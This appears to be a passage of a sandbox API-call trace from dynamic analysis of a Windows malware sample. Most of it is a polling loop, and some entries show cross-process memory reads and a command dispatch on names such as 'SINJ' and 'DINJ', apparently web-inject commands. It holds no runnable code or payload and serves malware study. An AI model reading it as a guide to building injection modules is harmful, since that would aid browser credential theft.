	[0237.029] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0237.029] Sleep (dwMilliseconds=0xbb8) 
	[0237.043] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.043] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.043] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.043] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.043] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.043] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0237.043] Sleep (dwMilliseconds=0xbb8) 
	[0237.058] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.058] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.058] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.058] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.059] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.059] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0237.059] Sleep (dwMilliseconds=0xbb8) 
	[0237.074] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.074] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.074] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.074] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.074] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.074] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0237.074] Sleep (dwMilliseconds=0xbb8) 
	[0237.089] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.090] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.090] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.090] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.090] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.090] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf680) returned 1
	[0237.090] Sleep (dwMilliseconds=0xbb8) 
	[0237.105] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0237.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
	[0237.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x2804418
	[0237.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x226160
	[0237.105] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0237.105] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225fc8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225fc8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0237.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0237.105] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7c68
	[0237.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x22b7c68, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0237.105] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x2804418, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2804418, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0237.106] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x226160, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x226160*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0237.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0237.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf6a8
	[0237.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x226160, cbMultiByte=-1, lpWideCharStr=0x27bf6a8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0237.106] SetEvent (hEvent=0x474) returned 1
	[0237.106] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0237.106] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2804418) returned 1
	[0237.106] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x226160) returned 1
	[0237.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0788
	[0237.106] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0237.106] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0237.106] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0237.106] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0237.106] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0237.106] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e17f8
	[0237.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27bf680, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xbdc) returned 0x6e8
	[0237.107] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c07b0
	[0237.107] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.107] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.107] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.108] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.108] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c07b0) returned 1
	[0237.108] Sleep (dwMilliseconds=0xbb8) 
	[0237.121] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.121] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.121] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.121] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.121] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.121] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c07b0) returned 1
	[0237.122] Sleep (dwMilliseconds=0xbb8) 
	[0237.136] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.137] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.137] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.137] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.137] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.137] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c07b0) returned 1
	[0237.137] Sleep (dwMilliseconds=0xbb8) 
	[0237.152] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.152] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.152] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.152] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.152] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.152] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c09b8) returned 1
	[0237.153] Sleep (dwMilliseconds=0xbb8) 
	[0237.185] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.185] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.185] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.185] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.185] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.185] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c09b8) returned 1
	[0237.185] Sleep (dwMilliseconds=0xbb8) 
	[0237.199] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.199] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.199] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.199] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.199] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.199] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c09b8) returned 1
	[0237.199] Sleep (dwMilliseconds=0xbb8) 
	[0237.215] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.215] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.216] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.216] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.216] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.216] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.216] Sleep (dwMilliseconds=0xbb8) 
	[0237.230] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.231] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.231] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.231] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.231] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.231] Sleep (dwMilliseconds=0xbb8) 
	[0237.246] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.246] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.246] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.246] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.246] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.246] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.246] Sleep (dwMilliseconds=0xbb8) 
	[0237.262] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.262] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.262] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.262] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.262] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.262] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.262] Sleep (dwMilliseconds=0xbb8) 
	[0237.320] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.320] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.320] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.320] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.320] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.320] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.320] Sleep (dwMilliseconds=0xbb8) 
	[0237.324] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.324] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.324] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.324] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.324] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.324] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.324] Sleep (dwMilliseconds=0xbb8) 
	[0237.340] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.341] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.341] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.341] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.341] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.341] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.341] Sleep (dwMilliseconds=0xbb8) 
	[0237.356] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.356] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.356] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.356] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.356] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.356] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.357] Sleep (dwMilliseconds=0xbb8) 
	[0237.418] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.418] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.418] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.418] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.418] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.418] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.418] Sleep (dwMilliseconds=0xbb8) 
	[0237.464] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.464] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.464] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.464] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.464] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.464] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.464] Sleep (dwMilliseconds=0xbb8) 
	[0237.508] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.508] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.508] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.508] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.509] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.509] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.509] Sleep (dwMilliseconds=0xbb8) 
	[0237.513] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.513] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.513] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.513] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.513] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.513] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.513] Sleep (dwMilliseconds=0xbb8) 
	[0237.529] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.529] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.529] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.529] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.529] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.529] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.529] Sleep (dwMilliseconds=0xbb8) 
	[0237.542] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.542] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.543] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.543] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.543] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.543] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.543] Sleep (dwMilliseconds=0xbb8) 
	[0237.559] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.559] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.559] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.559] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.559] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.560] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.560] Sleep (dwMilliseconds=0xbb8) 
	[0237.575] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.575] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.575] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.575] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.575] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.575] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.575] Sleep (dwMilliseconds=0xbb8) 
	[0237.590] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.590] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.590] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.590] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.590] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778938) returned 1
	[0237.590] Sleep (dwMilliseconds=0xbb8) 
	[0237.651] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0237.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b88
	[0237.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26cfba8
	[0237.651] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
	[0237.651] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0237.651] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225b88, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b88*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0237.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0237.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b76c8
	[0237.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b88, cbMultiByte=-1, lpWideCharStr=0x22b76c8, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0237.652] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26cfba8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26cfba8, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0237.652] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225fc8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225fc8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0237.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0237.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27789d8
	[0237.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x27789d8, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0237.652] SetEvent (hEvent=0x474) returned 1
	[0237.652] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b88) returned 1
	[0237.652] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cfba8) returned 1
	[0237.652] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0237.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778a00
	[0237.652] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0237.652] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0237.652] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0237.652] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0237.652] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0237.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b7950
	[0237.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2778938, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xdf8) returned 0x5d0
	[0237.653] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778988
	[0237.653] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.653] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.653] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.653] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.653] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778988) returned 1
	[0237.653] Sleep (dwMilliseconds=0xbb8) 
	[0237.667] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.667] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.667] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.667] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.667] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.667] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778988) returned 1
	[0237.667] Sleep (dwMilliseconds=0xbb8) 
	[0237.682] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.682] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.682] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.682] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.682] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.682] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778988) returned 1
	[0237.683] Sleep (dwMilliseconds=0xbb8) 
	[0237.698] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.698] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.698] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.698] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.698] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.698] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778988) returned 1
	[0237.698] Sleep (dwMilliseconds=0xbb8) 
	[0237.713] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.713] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.714] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.714] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.714] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.714] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c09b8) returned 1
	[0237.714] Sleep (dwMilliseconds=0xbb8) 
	[0237.729] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.729] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.729] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.729] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.729] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.729] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c09b8) returned 1
	[0237.729] Sleep (dwMilliseconds=0xbb8) 
	[0237.745] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.745] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.745] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.745] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.745] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.745] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c09b8) returned 1
	[0237.745] Sleep (dwMilliseconds=0xbb8) 
	[0237.760] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
